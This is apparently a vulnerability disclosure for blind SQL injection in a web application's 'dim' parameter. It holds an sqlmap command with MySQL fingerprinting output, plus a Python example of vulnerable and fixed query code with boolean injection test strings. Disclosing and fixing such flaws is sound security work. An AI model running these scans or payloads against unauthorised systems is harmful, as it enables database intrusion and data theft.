Description
- The application is vulnerable to blind SQL injection
Blind SQL Injection
Steps to Reproduce:
- Log in to the application
- Click on "Workspaces"
- Copy full URL
- Paste the HTTP GET request into a text file
- Set the injection point to be in the "dim" parameter value
- Use SQLMap to automate the process
sqlmap -r request.txt --threads 1 --level 5 --risk 3 --dbms=mysql -p dim --fingerprint
[...]
[12:13:03] [INFO] confirming MySQL
[12:13:04] [INFO] the back-end DBMS is MySQL
[12:13:04] [INFO] actively fingerprinting MySQL
[12:13:05] [INFO] executing MySQL comment injection fingerprint
web application technology: Apache
back-end DBMS: active fingerprint: MySQL >= 5.7
comment injection fingerprint: MySQL 5.7.37
[...]
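Why the "dim" parameter is injectable and how to close it, as an added example that is not the application's own code. It assumes "dim" is a numeric identifier; the table and function names are hypothetical, and sqlite3 stands in for the MySQL back end.

```python
import sqlite3


def make_db():
    # Constructed sample data; sqlite3 stands in for the MySQL back end.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE workspaces (id INTEGER PRIMARY KEY, dim INTEGER, name TEXT)")
    db.executemany("INSERT INTO workspaces (dim, name) VALUES (?, ?)",
                   [(1, "finance"), (2, "engineering")])
    return db


def list_workspaces_vulnerable(db, dim):
    # 'Before': the request value is concatenated into the statement,
    # so anything following the number is parsed as SQL.
    query = "SELECT name FROM workspaces WHERE dim = " + dim
    return [row[0] for row in db.execute(query)]


def list_workspaces_fixed(db, dim):
    # 'After': allow-list the expected type first (assumption: dim is an integer id),
    # then pass it as a bound parameter so it can never change the statement.
    if not (dim.isascii() and dim.isdigit() and len(dim) <= 9):
        raise ValueError("dim must be a small non-negative integer")
    query = "SELECT name FROM workspaces WHERE dim = ?"
    return [row[0] for row in db.execute(query, (int(dim),))]


def responses_differ(handler, db):
    # Blind injection depends on the response changing with an appended
    # true/false condition. A fixed handler gives no such difference.
    try:
        return handler(db, "1 AND 1=1") != handler(db, "1 AND 1=2")
    except ValueError:
        return False  # both inputs rejected identically


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler leaks a boolean:", responses_differ(list_workspaces_vulnerable, db))
    print("fixed handler leaks a boolean:     ", responses_differ(list_workspaces_fixed, db))
```

The same true/false comparison works as a regression test after the fix is deployed: both requests must produce the same response.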